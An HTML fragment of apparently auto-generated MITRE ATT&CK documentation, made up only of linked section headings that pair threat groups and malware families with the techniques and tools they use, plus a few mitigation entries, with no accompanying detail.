<div class="sect2">
<h3 id="_redleaves_s0153_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_redleaves_s0153_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_redleaves_s0153_uses_system_network_connections_discovery_t1049">RedLeaves (S0153) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004_uses_netstat_s0104"><a class="anchor" href="#_ke3chang_g0004_uses_netstat_s0104"></a><a class="link" href="#_ke3chang_g0004_uses_netstat_s0104">Ke3chang (G0004) uses netstat (S0104)</a></h3>
</div>
<div class="sect2">
<h3 id="_lowball_s0042_uses_commonly_used_port_t1043"><a class="anchor" href="#_lowball_s0042_uses_commonly_used_port_t1043"></a><a class="link" href="#_lowball_s0042_uses_commonly_used_port_t1043">LOWBALL (S0042) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_remote_system_discovery_t1018"><a class="anchor" href="#_shamoon_s0140_uses_remote_system_discovery_t1018"></a><a class="link" href="#_shamoon_s0140_uses_remote_system_discovery_t1018">Shamoon (S0140) uses Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_command_line_interface_t1059"><a class="anchor" href="#_redleaves_s0153_uses_command_line_interface_t1059"></a><a class="link" href="#_redleaves_s0153_uses_command_line_interface_t1059">RedLeaves (S0153) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_account_discovery_t1087"><a class="anchor" href="#_net_s0039_uses_account_discovery_t1087"></a><a class="link" href="#_net_s0039_uses_account_discovery_t1087">Net (S0039) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_pteranodon_s0147_uses_scheduled_task_t1053"><a class="anchor" href="#_pteranodon_s0147_uses_scheduled_task_t1053"></a><a class="link" href="#_pteranodon_s0147_uses_scheduled_task_t1053">Pteranodon (S0147) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_valid_accounts_t1078"><a class="anchor" href="#_cobalt_strike_s0154_uses_valid_accounts_t1078"></a><a class="link" href="#_cobalt_strike_s0154_uses_valid_accounts_t1078">Cobalt Strike (S0154) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_remsec_s0125_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_remsec_s0125_uses_system_network_configuration_discovery_t1016">Remsec (S0125) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_security_software_discovery_t1063"><a class="anchor" href="#_powruner_s0184_uses_security_software_discovery_t1063"></a><a class="link" href="#_powruner_s0184_uses_security_software_discovery_t1063">POWRUNER (S0184) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_axiom_g0001_uses_derusbi_s0021"><a class="anchor" href="#_axiom_g0001_uses_derusbi_s0021"></a><a class="link" href="#_axiom_g0001_uses_derusbi_s0021">Axiom (G0001) uses Derusbi (S0021)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_data_from_local_system_t1005"><a class="anchor" href="#_rover_s0090_uses_data_from_local_system_t1005"></a><a class="link" href="#_rover_s0090_uses_data_from_local_system_t1005">Rover (S0090) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_windshield_s0155"><a class="anchor" href="#_apt32_g0050_uses_windshield_s0155"></a><a class="link" href="#_apt32_g0050_uses_windshield_s0155">APT32 (G0050) uses WINDSHIELD (S0155)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_plugx_s0013"><a class="anchor" href="#_menupass_g0045_uses_plugx_s0013"></a><a class="link" href="#_menupass_g0045_uses_plugx_s0013">menuPass (G0045) uses PlugX (S0013)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_data_obfuscation_t1001"><a class="anchor" href="#_daserf_s0187_uses_data_obfuscation_t1001"></a><a class="link" href="#_daserf_s0187_uses_data_obfuscation_t1001">Daserf (S0187) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_hikit_s0009_uses_connection_proxy_t1090"><a class="anchor" href="#_hikit_s0009_uses_connection_proxy_t1090"></a><a class="link" href="#_hikit_s0009_uses_connection_proxy_t1090">Hikit (S0009) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_blackcoffee_s0069_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_blackcoffee_s0069_uses_file_and_directory_discovery_t1083">BLACKCOFFEE (S0069) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_gh0st_s0032_uses_input_capture_t1056"><a class="anchor" href="#_gh0st_s0032_uses_input_capture_t1056"></a><a class="link" href="#_gh0st_s0032_uses_input_capture_t1056">gh0st (S0032) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_commonly_used_port_t1043"><a class="anchor" href="#_powerduke_s0139_uses_commonly_used_port_t1043"></a><a class="link" href="#_powerduke_s0139_uses_commonly_used_port_t1043">PowerDuke (S0139) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_network_service_scanning_t1046"><a class="anchor" href="#_remsec_s0125_uses_network_service_scanning_t1046"></a><a class="link" href="#_remsec_s0125_uses_network_service_scanning_t1046">Remsec (S0125) uses Network Service Scanning (T1046)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_connection_proxy_t1090"><a class="anchor" href="#_chopstick_s0023_uses_connection_proxy_t1090"></a><a class="link" href="#_chopstick_s0023_uses_connection_proxy_t1090">CHOPSTICK (S0023) uses Connection Proxy (T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_s_type_s0085_uses_shortcut_modification_t1023"><a class="anchor" href="#_s_type_s0085_uses_shortcut_modification_t1023"></a><a class="link" href="#_s_type_s0085_uses_shortcut_modification_t1023">S-Type (S0085) uses Shortcut Modification (T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_scripting_t1064"><a class="anchor" href="#_apt34_g0057_uses_scripting_t1064"></a><a class="link" href="#_apt34_g0057_uses_scripting_t1064">APT34 (G0057) uses Scripting (T1064)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_gazer_s0168"><a class="anchor" href="#_turla_g0010_uses_gazer_s0168"></a><a class="link" href="#_turla_g0010_uses_gazer_s0168">Turla (G0010) uses Gazer (S0168)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_apt3_g0022_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_apt3_g0022_uses_exfiltration_over_command_and_control_channel_t1041">APT3 (G0022) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_rootkit_mitigation_t1014_mitigates_rootkit_t1014"><a class="anchor" href="#_rootkit_mitigation_t1014_mitigates_rootkit_t1014"></a><a class="link" href="#_rootkit_mitigation_t1014_mitigates_rootkit_t1014">Rootkit Mitigation (T1014) mitigates Rootkit (T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_process_discovery_t1057"><a class="anchor" href="#_kasidet_s0088_uses_process_discovery_t1057"></a><a class="link" href="#_kasidet_s0088_uses_process_discovery_t1057">Kasidet (S0088) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_molerats_g0021_uses_poisonivy_s0012"><a class="anchor" href="#_molerats_g0021_uses_poisonivy_s0012"></a><a class="link" href="#_molerats_g0021_uses_poisonivy_s0012">Molerats (G0021) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_commonly_used_port_t1043"><a class="anchor" href="#_shamoon_s0140_uses_commonly_used_port_t1043"></a><a class="link" href="#_shamoon_s0140_uses_commonly_used_port_t1043">Shamoon (S0140) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_access_token_manipulation_t1134"><a class="anchor" href="#_lazarus_group_g0032_uses_access_token_manipulation_t1134"></a><a class="link" href="#_lazarus_group_g0032_uses_access_token_manipulation_t1134">Lazarus Group (G0032) uses Access Token Manipulation (T1134)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_starloader_s0188"><a class="anchor" href="#_sowbug_g0054_uses_starloader_s0188"></a><a class="link" href="#_sowbug_g0054_uses_starloader_s0188">Sowbug (G0054) uses Starloader (S0188)</a></h3>
</div>
<div class="sect2">
<h3 id="_advstoreshell_s0045_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_advstoreshell_s0045_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_advstoreshell_s0045_uses_exfiltration_over_command_and_control_channel_t1041">ADVSTORESHELL (S0045) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_s0004_uses_clipboard_data_t1115"><a class="anchor" href="#_tinyzbot_s0004_uses_clipboard_data_t1115"></a><a class="link" href="#_tinyzbot_s0004_uses_clipboard_data_t1115">TinyZBot (S0004) uses Clipboard Data (T1115)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_data_obfuscation_t1001"><a class="anchor" href="#_powruner_s0184_uses_data_obfuscation_t1001"></a><a class="link" href="#_powruner_s0184_uses_data_obfuscation_t1001">POWRUNER (S0184) uses Data Obfuscation (T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_remsec_s0125_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_remsec_s0125_uses_standard_cryptographic_protocol_t1032">Remsec (S0125) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_cachedump_s0119"><a class="anchor" href="#_apt1_g0006_uses_cachedump_s0119"></a><a class="link" href="#_apt1_g0006_uses_cachedump_s0119">APT1 (G0006) uses Cachedump (S0119)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_system_service_discovery_t1007"><a class="anchor" href="#_elise_s0081_uses_system_service_discovery_t1007"></a><a class="link" href="#_elise_s0081_uses_system_service_discovery_t1007">Elise (S0081) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011_uses_valid_accounts_t1078"><a class="anchor" href="#_pittytiger_g0011_uses_valid_accounts_t1078"></a><a class="link" href="#_pittytiger_g0011_uses_valid_accounts_t1078">PittyTiger (G0011) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_epic_s0091"><a class="anchor" href="#_turla_g0010_uses_epic_s0091"></a><a class="link" href="#_turla_g0010_uses_epic_s0091">Turla (G0010) uses Epic (S0091)</a></h3>
</div>
<div class="sect2">
<h3 id="_extra_window_memory_injection_mitigation_t1181_mitigates_extra_window_memory_injection_t1181"><a class="anchor" href="#_extra_window_memory_injection_mitigation_t1181_mitigates_extra_window_memory_injection_t1181"></a><a class="link" href="#_extra_window_memory_injection_mitigation_t1181_mitigates_extra_window_memory_injection_t1181">Extra Window Memory Injection Mitigation (T1181) mitigates Extra Window Memory Injection (T1181)</a></h3>
</div>
<div class="sect2">
<h3 id="_suckfly_g0039_uses_command_line_interface_t1059"><a class="anchor" href="#_suckfly_g0039_uses_command_line_interface_t1059"></a><a class="link" href="#_suckfly_g0039_uses_command_line_interface_t1059">Suckfly (G0039) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_duqu_s0038_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_duqu_s0038_uses_standard_cryptographic_protocol_t1032">Duqu (S0038) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_monsoon_g0042_uses_autoit_backdoor_s0129"><a class="anchor" href="#_monsoon_g0042_uses_autoit_backdoor_s0129"></a><a class="link" href="#_monsoon_g0042_uses_autoit_backdoor_s0129">MONSOON (G0042) uses AutoIt backdoor (S0129)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackcoffee_s0069_uses_process_discovery_t1057"><a class="anchor" href="#_blackcoffee_s0069_uses_process_discovery_t1057"></a><a class="link" href="#_blackcoffee_s0069_uses_process_discovery_t1057">BLACKCOFFEE (S0069) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_keychain_mitigation_t1142_mitigates_keychain_t1142"><a class="anchor" href="#_keychain_mitigation_t1142_mitigates_keychain_t1142"></a><a class="link" href="#_keychain_mitigation_t1142_mitigates_keychain_t1142">Keychain Mitigation (T1142) mitigates Keychain (T1142)</a></h3>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_shamoon_s0140_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_shamoon_s0140_uses_standard_application_layer_protocol_t1071">Shamoon (S0140) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_input_capture_t1056"><a class="anchor" href="#_apt28_g0007_uses_input_capture_t1056"></a><a class="link" href="#_apt28_g0007_uses_input_capture_t1056">APT28 (G0007) uses Input Capture (T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_tasklist_s0057"><a class="anchor" href="#_oilrig_g0049_uses_tasklist_s0057"></a><a class="link" href="#_oilrig_g0049_uses_tasklist_s0057">OilRig (G0049) uses Tasklist (S0057)</a></h3>
</div>
<div class="sect2">
<h3 id="_deobfuscate_decode_files_or_information_mitigation_t1140_mitigates_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_deobfuscate_decode_files_or_information_mitigation_t1140_mitigates_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_deobfuscate_decode_files_or_information_mitigation_t1140_mitigates_deobfuscate_decode_files_or_information_t1140">Deobfuscate/Decode Files or Information Mitigation (T1140) mitigates Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_web_shell_t1100"><a class="anchor" href="#_owaauth_s0072_uses_web_shell_t1100"></a><a class="link" href="#_owaauth_s0072_uses_web_shell_t1100">OwaAuth (S0072) uses Web Shell (T1100)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_data_from_local_system_t1005"><a class="anchor" href="#_lazarus_group_g0032_uses_data_from_local_system_t1005"></a><a class="link" href="#_lazarus_group_g0032_uses_data_from_local_system_t1005">Lazarus Group (G0032) uses Data from Local System (T1005)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_accessibility_features_t1015"><a class="anchor" href="#_deep_panda_g0009_uses_accessibility_features_t1015"></a><a class="link" href="#_deep_panda_g0009_uses_accessibility_features_t1015">Deep Panda (G0009) uses Accessibility Features (T1015)</a></h3>
</div>
<div class="sect2">
<h3 id="_xcmd_s0123_uses_service_execution_t1035"><a class="anchor" href="#_xcmd_s0123_uses_service_execution_t1035"></a><a class="link" href="#_xcmd_s0123_uses_service_execution_t1035">xCmd (S0123) uses Service Execution (T1035)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_command_line_interface_t1059"><a class="anchor" href="#_plugx_s0013_uses_command_line_interface_t1059"></a><a class="link" href="#_plugx_s0013_uses_command_line_interface_t1059">PlugX (S0013) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_miner_c_s0133_uses_taint_shared_content_t1080"><a class="anchor" href="#_miner_c_s0133_uses_taint_shared_content_t1080"></a><a class="link" href="#_miner_c_s0133_uses_taint_shared_content_t1080">Miner-C (S0133) uses Taint Shared Content (T1080)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_file_deletion_t1107"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_file_deletion_t1107"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_file_deletion_t1107">Backdoor.Oldrea (S0093) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_indicator_removal_on_host_mitigation_t1070_mitigates_indicator_removal_on_host_t1070"><a class="anchor" href="#_indicator_removal_on_host_mitigation_t1070_mitigates_indicator_removal_on_host_t1070"></a><a class="link" href="#_indicator_removal_on_host_mitigation_t1070_mitigates_indicator_removal_on_host_t1070">Indicator Removal on Host Mitigation (T1070) mitigates Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_scarlet_mimic_g0029_uses_mobileorder_s0079"><a class="anchor" href="#_scarlet_mimic_g0029_uses_mobileorder_s0079"></a><a class="link" href="#_scarlet_mimic_g0029_uses_mobileorder_s0079">Scarlet Mimic (G0029) uses MobileOrder (S0079)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_file_deletion_t1107"><a class="anchor" href="#_threat_group_3390_g0027_uses_file_deletion_t1107"></a><a class="link" href="#_threat_group_3390_g0027_uses_file_deletion_t1107">Threat Group-3390 (G0027) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_modify_existing_service_t1031"><a class="anchor" href="#_bbsrat_s0127_uses_modify_existing_service_t1031"></a><a class="link" href="#_bbsrat_s0127_uses_modify_existing_service_t1031">BBSRAT (S0127) uses Modify Existing Service (T1031)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_application_shimming_t1138"><a class="anchor" href="#_fin7_g0046_uses_application_shimming_t1138"></a><a class="link" href="#_fin7_g0046_uses_application_shimming_t1138">FIN7 (G0046) uses Application Shimming (T1138)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_moonwind_s0149_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_moonwind_s0149_uses_system_owner_user_discovery_t1033">MoonWind (S0149) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_owaauth_s0072_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_owaauth_s0072_uses_standard_application_layer_protocol_t1071">OwaAuth (S0072) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_helminth_s0170_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_helminth_s0170_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_helminth_s0170_uses_permission_groups_discovery_t1069">Helminth (S0170) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_credential_dumping_t1003"><a class="anchor" href="#_bronze_butler_g0060_uses_credential_dumping_t1003"></a><a class="link" href="#_bronze_butler_g0060_uses_credential_dumping_t1003">BRONZE BUTLER (G0060) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_threat_group_3390_g0027_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_threat_group_3390_g0027_uses_system_network_configuration_discovery_t1016">Threat Group-3390 (G0027) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_prikormka_s0113_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_prikormka_s0113_uses_system_owner_user_discovery_t1033">Prikormka (S0113) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_data_encoding_t1132"><a class="anchor" href="#_seaduke_s0053_uses_data_encoding_t1132"></a><a class="link" href="#_seaduke_s0053_uses_data_encoding_t1132">SeaDuke (S0053) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_lazarus_group_g0032_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_lazarus_group_g0032_uses_custom_command_and_control_protocol_t1094">Lazarus Group (G0032) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011_uses_mimikatz_s0002"><a class="anchor" href="#_pittytiger_g0011_uses_mimikatz_s0002"></a><a class="link" href="#_pittytiger_g0011_uses_mimikatz_s0002">PittyTiger (G0011) uses Mimikatz (S0002)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_process_discovery_t1057"><a class="anchor" href="#_backspace_s0031_uses_process_discovery_t1057"></a><a class="link" href="#_backspace_s0031_uses_process_discovery_t1057">BACKSPACE (S0031) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_appcert_dlls_mitigation_t1182_mitigates_appcert_dlls_t1182"><a class="anchor" href="#_appcert_dlls_mitigation_t1182_mitigates_appcert_dlls_t1182"></a><a class="link" href="#_appcert_dlls_mitigation_t1182_mitigates_appcert_dlls_t1182">AppCert DLLs Mitigation (T1182) mitigates AppCert DLLs (T1182)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_rtm_s0148_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_rtm_s0148_uses_obfuscated_files_or_information_t1027">RTM (S0148) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_darkhotel_g0012_uses_code_signing_t1116"><a class="anchor" href="#_darkhotel_g0012_uses_code_signing_t1116"></a><a class="link" href="#_darkhotel_g0012_uses_code_signing_t1116">Darkhotel (G0012) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_oldbait_s0138_uses_credential_dumping_t1003"><a class="anchor" href="#_oldbait_s0138_uses_credential_dumping_t1003"></a><a class="link" href="#_oldbait_s0138_uses_credential_dumping_t1003">OLDBAIT (S0138) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_h1n1_s0132_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_h1n1_s0132_uses_bypass_user_account_control_t1088">H1N1 (S0132) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_mobileorder_s0079_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_mobileorder_s0079_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_mobileorder_s0079_uses_file_and_directory_discovery_t1083">MobileOrder (S0079) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_halfbaked_s0151_uses_process_discovery_t1057"><a class="anchor" href="#_halfbaked_s0151_uses_process_discovery_t1057"></a><a class="link" href="#_halfbaked_s0151_uses_process_discovery_t1057">HALFBAKED (S0151) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_command_line_interface_t1059"><a class="anchor" href="#_apt1_g0006_uses_command_line_interface_t1059"></a><a class="link" href="#_apt1_g0006_uses_command_line_interface_t1059">APT1 (G0006) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_process_injection_t1055"><a class="anchor" href="#_jhuhugit_s0044_uses_process_injection_t1055"></a><a class="link" href="#_jhuhugit_s0044_uses_process_injection_t1055">JHUHUGIT (S0044) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_bronze_butler_g0060_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_bronze_butler_g0060_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_bronze_butler_g0060_uses_file_and_directory_discovery_t1083">BRONZE BUTLER (G0060) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_magic_hound_g0059_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_magic_hound_g0059_uses_file_and_directory_discovery_t1083">Magic Hound (G0059) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_psylo_s0078_uses_remote_file_copy_t1105"><a class="anchor" href="#_psylo_s0078_uses_remote_file_copy_t1105"></a><a class="link" href="#_psylo_s0078_uses_remote_file_copy_t1105">Psylo (S0078) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_process_discovery_t1057"><a class="anchor" href="#_xagentosx_s0161_uses_process_discovery_t1057"></a><a class="link" href="#_xagentosx_s0161_uses_process_discovery_t1057">XAgentOSX (S0161) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_process_hollowing_t1093"><a class="anchor" href="#_bbsrat_s0127_uses_process_hollowing_t1093"></a><a class="link" href="#_bbsrat_s0127_uses_process_hollowing_t1093">BBSRAT (S0127) uses Process Hollowing (T1093)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_account_discovery_t1087"><a class="anchor" href="#_powruner_s0184_uses_account_discovery_t1087"></a><a class="link" href="#_powruner_s0184_uses_account_discovery_t1087">POWRUNER (S0184) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_gamaredon_group_g0047_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_gamaredon_group_g0047_uses_system_owner_user_discovery_t1033">Gamaredon Group (G0047) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_rover_s0090_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_rover_s0090_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_rover_s0090_uses_registry_run_keys_start_folder_t1060">Rover (S0090) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_apt28_g0007_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_apt28_g0007_uses_replication_through_removable_media_t1091">APT28 (G0007) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_redleaves_s0153_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_redleaves_s0153_uses_uncommonly_used_port_t1065">RedLeaves (S0153) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_tor_s0183_uses_multilayer_encryption_t1079"><a class="anchor" href="#_tor_s0183_uses_multilayer_encryption_t1079"></a><a class="link" href="#_tor_s0183_uses_multilayer_encryption_t1079">Tor (S0183) uses Multilayer Encryption (T1079)</a></h3>
</div>
<div class="sect2">
<h3 id="_browser_extensions_mitigation_t1176_mitigates_browser_extensions_t1176"><a class="anchor" href="#_browser_extensions_mitigation_t1176_mitigates_browser_extensions_t1176"></a><a class="link" href="#_browser_extensions_mitigation_t1176_mitigates_browser_extensions_t1176">Browser Extensions Mitigation (T1176) mitigates Browser Extensions (T1176)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_remote_file_copy_t1105"><a class="anchor" href="#_coreshell_s0137_uses_remote_file_copy_t1105"></a><a class="link" href="#_coreshell_s0137_uses_remote_file_copy_t1105">CORESHELL (S0137) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_backdoor_oldrea_s0093_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_backdoor_oldrea_s0093_uses_file_and_directory_discovery_t1083">Backdoor.Oldrea (S0093) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_man_in_the_browser_mitigation_t1185_mitigates_man_in_the_browser_t1185"><a class="anchor" href="#_man_in_the_browser_mitigation_t1185_mitigates_man_in_the_browser_t1185"></a><a class="link" href="#_man_in_the_browser_mitigation_t1185_mitigates_man_in_the_browser_t1185">Man in the Browser Mitigation (T1185) mitigates Man in the Browser (T1185)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_pass_the_hash_toolkit_s0122"><a class="anchor" href="#_apt1_g0006_uses_pass_the_hash_toolkit_s0122"></a><a class="link" href="#_apt1_g0006_uses_pass_the_hash_toolkit_s0122">APT1 (G0006) uses Pass-The-Hash Toolkit (S0122)</a></h3>
</div>
<div class="sect2">
<h3 id="_flashflood_s0036_uses_data_encrypted_t1022"><a class="anchor" href="#_flashflood_s0036_uses_data_encrypted_t1022"></a><a class="link" href="#_flashflood_s0036_uses_data_encrypted_t1022">FLASHFLOOD (S0036) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_credential_dumping_t1003"><a class="anchor" href="#_crimson_s0115_uses_credential_dumping_t1003"></a><a class="link" href="#_crimson_s0115_uses_credential_dumping_t1003">Crimson (S0115) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
